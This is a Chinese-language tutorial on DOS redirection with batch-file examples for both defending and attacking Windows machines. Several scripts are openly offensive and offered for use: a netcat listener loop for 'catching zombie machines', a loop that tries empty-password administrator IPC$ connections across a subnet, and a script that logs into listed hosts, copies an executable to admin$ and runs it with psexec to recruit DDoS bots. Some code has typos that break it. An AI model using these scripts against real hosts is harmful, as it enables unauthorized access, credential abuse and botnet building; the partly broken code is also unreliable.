DOS的重定向命令及在安全方面的應用

dos的重定向命令
2006-10-15 16:47
新手DOS應用技巧
人小鬼大 重定向命令在安全方面的應用
來源：ChinaITLab收集整理
2005-7-21 11:12:00

你們知道，DOS下有一個不爲你們所經常使用的命令——重定向命令，這個小東西很是有用，該命令一樣能夠用於 Win9x/ME/2000/XP下，靈活的使用這個命令能夠給咱們帶來很大的方便——不管是入侵仍是防守抑或是系統應用，都會帶來很大的便利。今天就讓 咱們來看幾個重定向命令在安全方面的應用實例。

1、命令格式

DOS的標準輸入輸出一般是在標準設備鍵盤和顯示器上進行的，利用重定向,能夠方便地將輸入輸出改向磁盤文件或其它設備。其中:

(1).大於號「>」將命令發送到文件或設備，例如打印機>prn。使用大於號「>」時，有些命令輸出(例如錯誤消息)不能重定向。

(2).雙大於號「>>」將命令輸出添加到文件結尾而不刪除文件中已有的信息。

(3).小於號「<」從文件而不是鍵盤上獲取命令所需的輸入。

(4).>&符號將輸出從一個默認I/O流(stdout,stdin,stderr)從新定向到另外一個默認I/O流。例如，command >output_file 2>&1將處理command過程當中的全部錯誤信息從屏幕重定向到標準文件輸出中。標準輸出的數值以下所示:

標準輸出 等價的數值

Stdin 0
Stdout 1
Stderr 2

其中，(1)和(2)都建立一個文件用於存放數據;(4)可能不可以在DOS下使用。

2、重定向命令的輸出

幾乎全部的命令均將輸出發送到屏幕。即便是將輸出發送到驅動器或打印機的命令，也會在屏幕上顯示消息和提示。要將輸出從屏幕重定向到文件或打印機，請使 用大於號(>)。大多數命令中都可以使用大於號。例如，在如下命令中，dir命令生成的目錄列表重定向到Dirlist.txt文件: dir>dirlist.txt，若是Dirlist.txt文件不存在，系統將建立該文件。若是Dirlist.txt存在，系統將使用dir命 令的輸出替換文件中的信息。

要將命令輸出添加到文件結尾而不丟失文件中的任何信息，請使用雙大於號(>>)。例如， 在如下命令中，dir命令生成的目錄列表附加到Dirlist.txt文件中:dir>dirlist.txt，將輸入重定向到一個命令，就象能夠 將命令輸出發送到文件或打印機而不是屏幕同樣，您能夠從文件而不是從鍵盤獲取命令的輸入。要從文件獲取輸入，請使用小於號(<)。例如，如下命令將 從List.txt文件中獲取sort命令的輸入:sort

3、應用舉例

1.給註冊表加鎖/解鎖

你們知道，註冊表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\ Policies\System分支下的DWORD值「Disableregistrytools」的鍵值如爲「1」，則能夠給註冊表加鎖，這樣別人就無 法使用註冊表編輯器。利用重定向命令在DOS下就能夠給註冊表加鎖/解鎖，很是方便。

打開記事本程序，新建一個文本文件，輸入以下內容:

@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>123.reg
@echo "DisableRegistryTools"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg

另存爲以.bat爲擴展名的批處理文件，點擊這個文件註冊表就會被鎖定!

在上面的命令中，echo是DOS下的回顯命令，在它的前面加上「@」前綴字符，表示執行時本行在命令行或DOS裏面不顯示，若是想看到程序執行過程， 請將「@」去掉。你們在編寫上述代碼時要注意的是，第一行中的「REGEDIT4」必定要用大寫字母，在第二行中「echo」和「.」之間沒有空格。 「>>」產生的內容將追加到它後面的文件中。在文件的最後一行加上deltree /y 123.reg，就能夠無需確認就刪除123.reg文件。

要想給註冊表解鎖，能夠編輯這個批處理文件，只需將 "DisableRegistryTools"=dword:00000001改成"DisableRegistryTools"=dword: 00000000，其餘內容不變，保存爲.bat文件，點擊就能夠給註冊表解鎖了。

2.把登錄3389的機器IP記錄下來

把下面的內容保存爲3389IP.bat:
time /t >>log.log
netstat -n -p tcp |find ":3389">>Log.log
start Explorer

運行3389IP.bat，而後查看log.log文件便可看到登錄3389的機器IP，是否是很方便呢?

3.恢復DOS實模式

你們知道，某些惡意網頁會修改瀏覽者的註冊表，在無所不用其極的各類手段中，修改註冊表使DOS實模式不可用是其中的招數之一。要想恢復DOS實模式方法有不少，用批處理和重定向命令結合使用，是比較特別的一招，在此與你們分享。

echo off
echo REGEDIT4>c:\scanreg.reg
@echo.>>lock.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>>c:\scanreg.reg
echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
regedit /s c:\scanreg.reg
@del c:\scanreg.reg

另存爲以.bat爲擴展名的批處理文件，點擊這個文件就能夠恢復DOS實模式，那些DOS應用程序又可使用了。

4.等待肉雞上門

天天費時費力的找肉雞是否是很辛苦，利用重定向命令和批處理文件就可讓你簡單的找到肉雞!方法是用記事本新建一個文本文件，輸入以下內容:

@echo off
:start
nc -vv -w 5 -l -p 80>>rouji.log
goto start

保存爲.bat文件(事先得準備好一個nc.exe文件，它是網絡故障事件檢測軟件Netcat的主程序)，而後運行此程序以後，你就等着肉雞上門主動來找你吧!運氣好的話，天天10個不成問題。

5.快速進行空鏈接

空鏈接是在沒有信任的狀況下與服務器創建的會話，換句話說，它是一個到服務器的匿名訪問。使用命令net use \\IP\ipc$ "" /user:"" 就能夠簡單地和目標創建一個空鏈接(須要目標開放IPC$)。利用重定向命令和for命令就能夠對一個C類網段進行快速的空鏈接，並把結果保存到一個文件 中供你分析。方法是用記事本編輯以下內容的文件:

@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%Gipc$ "" /use:"Administrator" | find "命令完成" >>test.txt

批處理文件保存爲.bat，運行便可。這個批處理文件的功能是對你指定的一個C類網段中的254個ip依次試創建賬號爲administrator口令 爲空的ipc$鏈接，若是成功就把結果記錄在test.txt。這樣就實現了NT弱口令掃描功能!其中，for命令的功能是對一組文件中的每個文件執行 某個特定命令，也就是能夠用你指定的循環範圍生成一系列命令。For命令的格式爲:FOR %variable IN (set) DO command [command-parameters]，具體的含義:

%variable:指定一個單一字母可替換的參數。

(set):指定一個或一組文件。可使用通配符。

command:指定對每一個文件執行的命令。

command-parameters:爲特定命令指定參數或命令行開關。

在批處理文件中使用FOR命令時，指定變量請使用%%variable而不要用%variable。變量名稱是區分大小寫的，因此%i不一樣%I。

6.禁止空鏈接

空鏈接的存在對有必定的危險，因此咱們仍是禁止它爲好!方法是輸入net share察看本地共享資源，接下來輸入以下命令刪除共享:

net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(若是有e,f等盤符能夠同法刪除)

而後用記事本新建一個文本文件，輸入以下內容便可:

@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA]>>123.reg
@echo "RestrictAnonymous"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg

另存爲以.bat爲擴展名的批處理文件，點擊這個文件就能夠禁止空鏈接。

7.掃描全部和本機以TCP協議鏈接的計算機

掃描本身的計算機端口，發現有特殊端口打開，能夠查木馬，不只如此，利用下面這個批處理文件還能夠把全部和本機以TCP協議鏈接的計算機IP地址都記錄下來。這個.bat文件內容以下:

data /t>>123.log
time /t>>123.log
netstat -n -p tcp 10>>123.log

這樣不只能夠記錄下對方的IP，還有時間和日期，方便本身查看。

8.自動獲取DDoS肉雞

DDoS是Distributed Denial of Service的縮寫，意即分佈式拒絕服務攻擊。它是指藉助於客戶/服務器技術，將多個計算機聯合起來做爲攻擊平臺，對一個或多個目標發動DoS攻擊，從 而成倍地提升拒絕服務攻擊的威力。一般，攻擊者使用一個偷竊賬號將DDoS主控程序安裝在一個計算機上，在一個設定的時間主控程序將與大量代理程序通信， 代理程序已經被安裝在Internet上的許多計算機上。代理程序收到指令時就發動攻擊。利用客戶/服務器技術，主控程序能在幾秒鐘內激活成百上千次代理 程序的運行。

雖然不建議你們使用DDoS方式攻擊，但做爲技術掌握仍是頗有必要的。但是，如何才能獲取進行DDoS攻擊的肉雞呢?把下面的內容保存爲ok.bat文件就能夠達到目的了:

@echo off
echo自動獲取DDoS肉雞
for /f "tokens=1,3*" %i in (host.txt) do net use \\%k\ipc$ /user:"%j"
copy %1 \\%i\admin$\sysytem32
if errorelevel 0 goto success
psexec -d \\%i c:\winnt\system32\%1
net user \\%i\ipc$ /del
:success
echo ------------------------------>>success.txt
echo 肉雞:%i>>success.txt
echo 用戶名:%j>>success.txt
echo 密碼:%k>>success.txt
echo ------------------------------>>success.txt

使用方法是ok.bat *.exe host.txt，其中host.txt的格式爲:ip administrator password。好了，快試試吧。但不要用來幹破壞哦。

其實，本文所說的方法主要是利用了批處理和相關的命令，重定向命令在其中只是個「傳接劑」，起鏈接做用，但它的功勞也是不小的，因此咱們不要忘了重定向命令哦。本文只是拋磚引玉，但願你們暢所欲言，多多指點。在寫做時參閱過衆多高手的論壇帖子，多謝各位。

出處：http://wenku.baidu.com/link?url=nlmn3D6gtQ-dY1jIlvaUn1rHJyJ2CX24G6Alidg6OHdbkog70pyaw3Fxtiq_Guk4wo37FIgOLmGujoqG7anysXqK569jPwRtl-RkHHw3F03